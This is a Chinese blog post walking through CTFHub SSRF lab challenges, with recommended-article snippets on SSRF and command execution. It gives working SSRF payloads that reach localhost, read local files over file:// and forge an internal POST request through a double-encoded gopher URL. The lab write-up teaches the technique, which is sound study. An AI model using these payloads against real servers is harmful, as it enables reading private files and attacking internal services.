CTFHUB WEB ssfr漏洞(上)

最新推荐文章于 2024-05-14 02:43:00 发布
最新推荐文章于 2024-05-14 02:43:00 发布
阅读量230 收藏
点赞数 1
分类专栏: BUUCTF CTFHUB 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwwyyyrre/article/details/130107968
版权

内网访问

打开题目 没发现什么信息 既然说是内网访问 就直接访问一下看看

?url=http://127.0.0.1/flag.php

拿到flag ctfhub{dda42b59520454e9be473b7f}

伪协议读取文件

 既然说是伪协议读取

file:// 协议

作用:用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。

http/s协议

作用:探测内网主机存活

dict协议

作用:泄露安装软件版本信息,查看端口,操作内网redis服务等

Gopher协议

作用:Gopher协议可以说是SSRF中的万金油。利用此协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。

 web常用本地网址 var/www/html/

所以构造payload:/?url=file:///var/www/html/flag.php

 

在源代码里找到flag    ctfhub{45e4051ecf28bd34dba0376d}

端口扫描

给的提示

这时候就需要用我们万能的bp爆破了

抓包 把他发送到爆破板块 

爆破到端口是8770

登录 找到flag ctfhub{dcb44b70e12cda5cd216cd9c}

POST请求

看提示说是用php的curl实现的 会302跳转

302跳转的302是http状态码

表示请求的网页自请求的网页移动到了新的位置,搜索引擎索引中保存原来的URL

这里可以通过访问302.php,并且传参gopher来伪造本地访问

Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。随着HTTP协议的壮大,Gopher协议已经慢慢的淡出了我们的视线,但是Gopher协议很多组件都支持并且可以做很多事,在SSRF中,Gopher协议可以对FTP、Telnet、Redis、Memcache、mysql进行攻击,也可以发送GET、POST 请求。

那么Gopher协议需要如何构造妮?

其实这个协议和http协议很类似,只不过gopher协议没有默认端口,需要特殊指定,而且需要指定POST方法,回车换行需要使用%0d%0a,而且POST参数之间的&分隔符也需要URL编码

我们来看看Gopher协议的基本协议格式

gopher://:/_后接TCP数据流

 先用dirsearch扫描一下

 扫描到的flag.php有显示 f12看源码 这里有个key key=ff40207373f308be939c12380ff89f66

 用file协议查看一下源码

file://var/www/html/index.php

file://var/www/html/flag.php

 flag.php希望我们用127.0.0.1这个ip地址来上传key值

($_SERVER["REMOTE_ADDR"] != 这个函数会获取我们的ip地址

在index.php中 是用了curl函数来获取并且输出数据,curl可以支持的伪协议有很多,gopher,file,dict,http/s

那么我们可以通过gopher协议,向flag.php传一个post报文,报文里面包含有key,大概内容为

url=gopher://127.0.0.1:80/_POST报文内容

这样我们就可以通过伪造127.0.0.1的ip来上传key

首先先来构造POST

POST /flag.php HTTP/1.1

Host: 127.0.0.1:80

Content-Length: 36

Content-Type: application/x-www-form-urlencoded

key=ff40207373f308be939c12380ff89f66

这里我们报文内容显示在url上输入,被解码后保存到curl里面,再通过curl输出跳转,又解码了一次,所以我们要对POST报文内容进行两次url编码

在第一次编码要把%0A全部改成%0D0A,%0A是在linux系统中中代表换行符,在windos中是%0D0A代表换行符,但是网上的编码器大都是编码的%0A,所以我们需要改成windos能够识别的

构造的payload:?url=127.0.0.1/?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253Dff40207373f308be939c12380ff89f66

用bp抓包 得到flag

 

呕...
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
94.网络安全渗透测试—[常规漏洞挖掘与利用篇10]—[SSFR漏洞与测试]
qwsn
02-03 2420
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SSRF漏洞与测试 1、SSRF漏洞定义 2、SSRF漏洞示例 (1)靶机链接: (2)漏洞代码: (3)扫描内部网络:`利用http://协议` (4)读取本地文件:`利用file://协议` (5)攻击内部网络: (6)识别内部系统:
CTFWeb)中关于执行读取文件命令的相关知识与绕过技巧
最新发布
2401_84971075的博客
05-16 349
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
什么是SSRF攻击?该如何防御SSRF攻击?_,来防止ssrf攻击
2401_84968222的博客
05-14 1047
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SSRF漏洞
Jim的博客
09-07 1120
SSRF漏洞的寻找(漏洞常见出没位置): 1)分享:通过URL地址分享网页内容 2)转码服务 3)在线翻译 4)图片加载与下载:通过URL地址加载或下载图片 5)图片、文章收藏功能 6)未公开的api实现以及其他调用URL的功能 7)从URL关键字中寻找    share wap url link src sour
【网络安全】SSRF漏洞
边缘拼命划水的小陈
04-23 444
由于服务器提供了从其他服务器获取应用数据的功能,但是又没有对目标地址做严格的过滤和限制,导致攻击者可以传入任意的地址来让后端服务对其发起请求,并返回对该目标地址请求的数据。SSRF(Server-Side Request Forgery:服务器端请求伪造)翻译软件会使用自己的服务器访问目标服务器。远端服务器创建文本文件。
SSRF 攻击及其防御策略
滕青山博客
01-24 2044
1. 什么是 SSRF 攻击⚔ SSRF 全称 Server-side Request Forgery,即服务器端请求伪造。 其原理就是利用服务器端的某些漏洞,在客户端访问到服务器内部或者服务器所在内网的信息;而在正常情况下,这些信息是无法直接访问到的。 2. 一个简单的例子???? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import requests from flask import Flask, request app
SSRF漏洞原理与案例演示
weixin_43534549的博客
06-03 404
查看后端代码 修改网址
超微H12SSFR-AN6用户手册
03-24
超微H12SSFR-AN6用户手册
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
小型林间独栖反刍动物栖息地选择研究进展 (2007年)
06-05
文章概述了SSFR栖息地的一般生态特征对其栖息地利用的影响,阐述了不同尺度水平的SSFR栖息地选择的研究现状,结合其他有蹄类动物的相关研究,论述了关于SSFR家域、觅食地和卧息地选择的研究进展,简要探讨了栖息地...
multiparameter_cloud_retrieval:用于从传输的辐射进行高光谱云遥感的 IDL 和 python 代码的集合
06-24
使用多个光谱形状参数检索云属性专门用于计算云特性(云光学厚度、云粒子有效半径和云热力学相位)的科学分析代码使用 4STAR 机载研究平台仪器进行的天顶光谱辐射测量或 SSFR 地面辐射测量来检索这些云特性。...
频域法辨识同步机参数 (1995年)
05-09
提供和比较了静态频率响应法(SSFR)和在线频率响应法(OLFR)两种测定同步机参数的方法。两种方法都能提供d轴和q轴的参数,并都经过实验验证,SSFR方法简单易行,获得的数据与设计值接近。OLFR法...
ctfhub-伪协议读取文件
m0_62094846的博客
11-06 1485
要我们读取flag.php 这道题,先要知道几个伪协议 file:// php://input(执行php代码) php://filter(读取源码) zip://(压缩文件) data://(执行php代码) 使用这个读不出来,php://filter/read=convert.base64-encode/resource=flag.php 查了一下,这个是文件包含中的,不能用于ssrf 一般网站的目录都放在www/html/目录下,使用file:///var/www/html...
ctfhub-ssrf】伪协议读取文件
weixin_52116519的博客
04-28 1366
题目 根据题目提示,需要我们读取服务器的web目录的flag.php文件。web目录一般在/var/www/html。 file:// 协议 中文释义:本地文件传输协议 注解:File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 应用:要使用File协议,基本的格式如下:file:///文件路径 比如要打开F盘flash文件夹中的1.swf文件,那么可以在资源管理器或IE地址栏中键入:file:///f:/flash/1.swf并回车。 解题 ...
ctf训练 web安全命令执行漏洞
qq_43799246的博客
12-03 959
ctf训练 web安全命令执行漏洞 命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。 调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.co
CTF-登录密码重置漏洞分析溯源
asd158923328的博客
08-24 967
根据题意 进入环境,进入密码重置页面,填写信息 根据页面说明里的18868345809已注册,获取短信验证码,然后修改手机号为17101304128,拿到key
CTF 文件包含与伪协议
weixin_30810583的博客
11-06 864
正巧在写代码审计的文章,无意间看到了一篇CTF的代码审计,CTF题目很好,用的姿势正如标题,文件包含和伪协议。 先放出原文链接(http://www.freebuf.com/column/150028.html) 题目源自国外某挑战平台,平台上还有许多其他有趣的challenges题目。 站点地址:http://chall.tasteless.eu/ 这次的题目链接:http://leve...
Web 安全漏洞 SSRF 简介及解决方案
程序员阿飘 的博客
02-16 466
攻击者可根据程序流程,使用应用所在服务器发出攻击者想发出的 http 请求,利用该漏洞来探测生产网中的服务,可以将攻击者直接代理进内网中,可以让攻击者绕过网络访问控制,可以下载未授权的文件,可以直接访问内网,甚至能够获取服务器凭证。笔者负责的内部 web 应用中有一个下载文件的接口 /download,其接受一个 url 参数,指向需要下载的文件地址,应用向该地址发起请求,下载文件至应用所在服务器,然后作后续处理。阅读永远是最有效的方法,尽管书籍并不一定是最好的入门方式,但书籍的理解需要一定的基础;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值